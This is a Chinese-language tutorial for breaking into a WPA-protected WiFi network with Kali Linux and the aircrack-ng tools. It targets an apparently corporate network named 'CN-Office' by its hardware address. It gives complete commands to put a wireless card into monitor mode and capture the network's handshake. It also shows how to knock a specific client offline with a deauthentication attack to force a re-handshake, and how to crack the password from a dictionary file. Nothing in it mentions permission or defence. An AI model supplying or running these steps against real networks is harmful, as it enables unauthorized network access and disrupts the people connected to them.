1、Kali Linux系统。
2、无线网卡(需支持监听模式)。
3、密码字典(重要)。
1、 查看本机无线网卡(本机wlan1为支持监听的无线网卡), root@kali:~# airmon-ng
2、启动网卡为监听模式。root@kali:~# airmon-ng start wlan1
3、查看附近Wifi情况和选择要破解的Wifi。root@kali:~# airodump-ng wlan1mon
4、按上图搜索出的Wifi中,我们现在CN-Office作为要破解的目标,因为这是企业Wifi,采用多AP模式,信号越强,就会排序在最前面。我们的目标CN-Office(DC:99:14:7D:AB:00)
5、选择 CN-Office(DC:99:14:7D:AB:00) 进行抓取握手包。root@kali:~# airodump-ng -c 1 -w office --bssid DC:99:14:7D:AB:00 wlan1mon
说明:-c:指定选择的频道,-w:指定一个文件名,用于保存捕获的数据,--bssid:指定攻击的BSSID。
上图为 DC:99:14:7D:AB:00 所链接的设备,STATION为对应的MAC地址。
6、查看所有抓取的数据包
如果不能抓取到握手包,可以尝试使用命令攻击AP,使其AP和客户端重新握手,从而抓取握手包。
攻击命令:root@kali:~# aireplay-ng -0 5 -a DC:99:14:7D:AB:00 -c B0:EB:57:EA:94:72 wlan1mon。
-0 5:表示使用Deauth攻击模式,后面的5为攻击次数。
-a:指定AP的MAC地址。
-c :指定客户端的MAC地址。
7、破解抓取的数据包。office-01.cap
root@kali:~# aircrack-ng -w /passwd/common.txt office-01.cap
说明:-w:密码字典保存路径。office-01.cap 为抓取的握手包,里面包含有Wifi链接密码。
上图中的 KEY FOUND 就是破译结果,而12345678则为Wifi密码。